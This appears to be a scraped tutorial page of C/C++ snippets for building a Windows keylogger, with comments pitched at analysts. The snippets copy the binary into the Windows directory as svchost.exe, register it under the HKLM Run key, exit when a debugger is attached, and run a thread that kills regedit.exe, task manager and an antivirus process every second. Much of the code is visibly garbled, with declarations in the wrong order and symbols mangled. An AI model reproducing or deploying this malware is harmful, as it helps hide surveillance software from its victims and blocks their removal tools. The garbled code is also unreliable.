// Registry
// File-scope state shared by the snippets on this page. None of the visible code
// writes myname, tmpdir or dwFlags; the global hKey is shadowed by the hKey
// parameter of RegWriteString below, so that function never touches this one.
char myname [500], tmpdir [500];
HKEY hKey;
DWORD dwFlags;
// ========================
// Forward declarations. The two extern lines are a garbled transcription of the
// CRT's command-line externs (presumably `extern int __argc; extern char **__argv;`).
extern int __ argc;
__argv extern char **;
ATOM MyRegisterClass (HINSTANCE hInstance);
LRESULT CALLBACK WndProc (HWND, UINT, WPARAM, LPARAM);
// Exported hook callback with the (code, wParam, lParam) shape of a Windows hook
// procedure; neither its body nor the hook installation appears in this excerpt.
// The dllexport is what makes the routine visible by name in the image's export table.
__declspec (dllexport) LRESULT CALLBACK KeyEvent (int pHookCode, pParamW WPARAM, LPARAM pParamL);
// EP section
// The registry function
/*
 * Creates (or opens) hKey\lpSubKey and stores lpData as a REG_SZ value named
 * lpValueName under it.
 *
 * Observations on the code as written:
 *  - ret receives the results of RegCreateKey and RegSetValueEx but is never
 *    examined, so a failed write is silent.
 *  - phkResult is first given 255 malloc'd bytes; RegCreateKey then overwrites the
 *    variable with the real handle, so that allocation is never used or freed.
 *  - RegCloseKey is called on the caller's hKey, not on the phkResult this function
 *    opened.
 * This is the only registry write in the excerpt; the autostart snippet below calls
 * it for HKLM\Software\Microsoft\Windows\CurrentVersion\Run, which is the value an
 * investigator would look for.
 */
void RegWriteString (HKEY hKey, LPCTSTR lpSubKey, lpValueName LPCTSTR, LPCTSTR lpData)
{
int ret = 0;
PhkResult HKEY = (HKEY) malloc (255);
ret = RegCreateKey (hKey, lpSubKey, & phkResult);
ret = RegSetValueEx (phkResult, lpValueName, 0, REG_SZ, (BYTE *) lpData, strlen (lpData));
RegCloseKey (hKey);
return;
}
Usage example — auto-startup:
Get the keylogger's own path, copy it into the Windows directory under the name svchost, then create a registry key so it starts automatically:
// Create startup and copying files
// Persistence. szCurrent receives this module's own path; szPath is built as
// "<WindowsDir>\svchost.exe" with two unbounded strcat calls into a MAX_PATH buffer.
// CopyFile is called with bFailIfExists = true, so an existing file of that name is
// left alone, and the path is then registered under
// HKLM\Software\Microsoft\Windows\CurrentVersion\Run as the value "svchost system".
// Indicators for a defender: an svchost.exe sitting directly in the Windows directory
// (the genuine one lives in System32) and a Run value whose data points at it.
szCurrent char [MAX_PATH];
szPath char [MAX_PATH];
GetModuleFileName (NULL, szCurrent, MAX_PATH-1);
GetWindowsDirectory (szPath, sizeof (szPath));
strcat (szPath, "\ \");
strcat (szPath, "svchost.exe");
CopyFile (szCurrent, szPath, true);
RegWriteString (HKEY_LOCAL_MACHINE, "Software \ \ Microsoft \ \ Windows \ \ CurrentVersion \ \ Run", "svchost system", szPath);
Anti-debug
// Anti-debug: terminate immediately when a user-mode debugger is attached.
// The if body is a single unbraced statement.
if (IsDebuggerPresent () == TRUE)
ExitProcess (0);
Monitoring running processes and killing those the keylogger treats as harmful to itself
Preprocessor
[Crayon lang = "c + +"] # include tlhelp32.h [/ crayon]
Variable Declaration
// Forward declaration of the killer thread procedure, and the variable CreateThread
// fills with the new thread's id.
DWORD WINAPI terminator (LPVOID Param);
DWORD id = 0;
Process-killer function:
// Function process killer
// Globals used by KillProc. hProcess only ever holds the most recently opened
// handle. The entry is declared as PE32 but used as pe32 below — presumably a
// transcription artifact.
HANDLE hProcessSnap;
HANDLE hProcess;
PROCESSENTRY32 PE32;
/*
 * Terminates every running process whose image name equals szProcess.
 *
 * Takes a Toolhelp snapshot of all processes, walks it with Process32First /
 * Process32Next and, for each exact (case-sensitive) strcmp match, opens the process
 * with PROCESS_TERMINATE and calls TerminateProcess on it. The entry filled in by
 * Process32First is never compared, only those returned by Process32Next.
 * No return value is checked, and only the last hProcess is closed, so several
 * matches in one pass leave handles open.
 *
 * Observable behaviour for detection: a single process repeatedly opening others
 * with PROCESS_TERMINATE, selected by image name (the names are in terminator below).
 */
KillProc void (char * szProcess)
{
hProcessSnap = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS, 0);
pe32.dwSize = sizeof (PROCESSENTRY32);
Process32First (hProcessSnap, and PE32);
// Iterate over the remaining snapshot entries.
while (Process32Next (hProcessSnap, and PE32))
{
if (! strcmp (pe32.szExeFile, szProcess))
{
hProcess = OpenProcess (PROCESS_TERMINATE, 0, pe32.th32ProcessID);
TerminateProcess (hProcess, 0);
}
}
CloseHandle (hProcess);
CloseHandle (hProcessSnap);
} [/ Crayon]
Using the process killer
// Process killer
/*
 * Thread procedure started by the CreateThread call below. Once a second it calls
 * KillProc for the image names regedit.exe, taskman.exe and PCMAV.exe — the Registry
 * Editor, a task-manager name, and presumably an antivirus process — so that tools a
 * user might use to inspect or remove the keylogger are continuously closed.
 * The while(1) loop never exits, so the return statement is unreachable.
 * Param is unused.
 */
DWORD WINAPI terminator (LPVOID Param)
{
while (1)
{
Sleep (1000);
KillProc ("regedit.exe");
KillProc ("taskman.exe");
KillProc ("PCMAV.exe");
}
EXIT_SUCCESS return;
}
Create a new thread that runs the monitoring / process-killer function:
// Starts the killer thread: default security attributes and stack size, no argument
// (terminator ignores Param), running immediately; the thread id lands in the global id.
// The returned thread handle is discarded.
CreateThread (NULL, 0, & terminator, NULL, 0, & id);
[/ Crayon]